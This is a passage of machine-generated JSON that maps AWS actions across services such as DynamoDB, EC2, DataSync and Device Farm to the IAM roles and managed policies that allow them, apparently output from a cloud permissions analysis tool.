null}}}}}}}},"controltower:describeGuardrail": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"controltower:describeGuardrailForTarget": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"controltower:describeManagedAccount": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"controltower:describeSingleSignOn": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"controltower:getAvailableUpdates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"controltower:getHomeRegion": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"controltower:getLandingZoneStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"controltower:listDirectoryGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"controltower:listGuardrailViolations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"controltower:listGuardrailsForTarget": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"controltower:listManagedAccounts": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"controltower:listManagedAccountsForGuardrail": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"controltower:listManagedAccountsForParent": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"controltower:listManagedOrganizationalUnits": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"controltower:listManagedOrganizationalUnitsForGuardrail": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"datapipeline:describeObjects": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"datapipeline:describePipelines": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"datapipeline:getPipelineDefinition": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"datapipeline:listPipelines": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"datapipeline:queryObjects": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"datasync:describeAgent": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"datasync:describeLocationEfs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"datasync:describeLocationFsxWindows": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"datasync:describeLocationNfs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"datasync:describeLocationS3": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"datasync:describeLocationSmb": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"datasync:describeTask": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"datasync:describeTaskExecution": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"datasync:listAgents": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"datasync:listLocations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"datasync:listTaskExecutions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"datasync:listTasks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dax:describeClusters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dax:describeDefaultParameters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dax:describeEvents": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dax:describeParameterGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dax:describeParameters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dax:describeSubnetGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"detective:getMembers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"detective:listGraphs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"detective:listInvitations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"detective:listMembers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:getAccountSettings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:getDevice": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:getDevicePool": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:getDevicePoolCompatibility": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:getJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:getProject": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:getRemoteAccessSession": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:getRun": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:getSuite": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:getTest": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:getTestGridProject": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:getTestGridSession": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:getUpload": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:listArtifacts": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:listDevicePools": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:listDevices": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:listJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:listProjects": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:listRemoteAccessSessions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:listRuns": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:listSamples": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:listSuites": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:listTestGridProjects": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:listTestGridSessionActions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:listTestGridSessionArtifacts": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:listTestGridSessions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:listTests": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:listUniqueProblems": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"devicefarm:listUploads": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"directconnect:describeConnections": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"directconnect:describeConnectionsOnInterconnect": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"directconnect:describeInterconnects": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"directconnect:describeLocations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"directconnect:describeVirtualGateways": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"directconnect:describeVirtualInterfaces": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dlm:getLifecyclePolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dlm:getLifecyclePolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dms:describeAccountAttributes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dms:describeConnections": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dms:describeEndpointTypes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dms:describeEndpoints": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dms:describeOrderableReplicationInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dms:describeRefreshSchemasStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dms:describeReplicationInstances": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dms:describeReplicationSubnetGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ds:describeConditionalForwarders": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ds:describeDirectories": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ds:describeEventTopics": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ds:describeSnapshots": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ds:describeTrusts": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ds:getDirectoryLimits": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ds:getSnapshotLimits": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ds:listIpRoutes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ds:listSchemaExtensions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ds:listTagsForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dynamodb:*": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"dynamodb:DescribeLimits": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"dynamodb:DescribeTable": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"dynamodb:ListTables": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"dynamodb:describeBackup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dynamodb:describeContinuousBackups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dynamodb:describeGlobalTable": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dynamodb:describeLimits": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dynamodb:describeStream": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dynamodb:describeTable": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dynamodb:describeTimeToLive": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dynamodb:listBackups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dynamodb:listGlobalTables": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dynamodb:listStreams": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dynamodb:listTables": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"dynamodb:listTagsOfResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"ec2:AuthorizeSecurityGroupEgress": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:AuthorizeSecurityGroupIngress": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:CancelSpotInstanceRequests": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}},"AROAJ2LRZXYT2USPF2ZTY": {"Resource": {"*": {"policies": {"ANPAI4YEZURRMKACW56EA": {"condition": null}}}}}}}},"ec2:CreateFleet": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:CreateLaunchTemplate": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:CreateNetworkInterface": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:CreateSecurityGroup": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:CreateTags": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DeleteLaunchTemplate": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}},"AROAJ2LRZXYT2USPF2ZTY": {"Resource": {"*": {"policies": {"ANPAI4YEZURRMKACW56EA": {"condition": null}}}}}}}},"ec2:DeleteNetworkInterface": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}},"AROAJ2LRZXYT2USPF2ZTY": {"Resource": {"*": {"policies": {"ANPAI4YEZURRMKACW56EA": {"condition": null}}}}}}}},"ec2:DeletePlacementGroup": {"roles": {"Allow": {"AROAJ2LRZXYT2USPF2ZTY": {"Resource": {"*": {"policies": {"ANPAI4YEZURRMKACW56EA": {"condition": null}}}}}}}},"ec2:DeleteSecurityGroup": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DeleteTags": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DeleteVolume": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}},"AROAJ2LRZXYT2USPF2ZTY": {"Resource": {"*": {"policies": {"ANPAI4YEZURRMKACW56EA": {"condition": null}}}}}}}},"ec2:Describe*": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"ec2:DescribeAccountAttributes": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DescribeAddresses": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"ec2:DescribeAvailabilityZones": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DescribeDhcpOptions": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DescribeImages": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}},"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"ec2:DescribeInstanceAttribute": {"roles": {"Allow": {"AROAJ2LRZXYT2USPF2ZTY": {"Resource": {"*": {"policies": {"ANPAI4YEZURRMKACW56EA": {"condition": null}}}}}}}},"ec2:DescribeInstanceStatus": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DescribeInstances": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}},"AROAJ2LRZXYT2USPF2ZTY": {"Resource": {"*": {"policies": {"ANPAI4YEZURRMKACW56EA": {"condition": null}}}}},"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"ec2:DescribeInternetGateways": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"ec2:DescribeKeyPairs": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DescribeLaunchTemplateVersions": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"ec2:DescribeLaunchTemplates": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}},"AROAJ2LRZXYT2USPF2ZTY": {"Resource": {"*": {"policies": {"ANPAI4YEZURRMKACW56EA": {"condition": null}}}}}}}},"ec2:DescribeNetworkAcls": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DescribeNetworkInterfaces": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DescribePlacementGroups": {"roles": {"Allow": {"AROAJ2LRZXYT2USPF2ZTY": {"Resource": {"*": {"policies": {"ANPAI4YEZURRMKACW56EA": {"condition": null}}}}}}}},"ec2:DescribePrefixLists": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"ec2:DescribeReservedInstances": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"ec2:DescribeReservedInstancesOfferings": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": 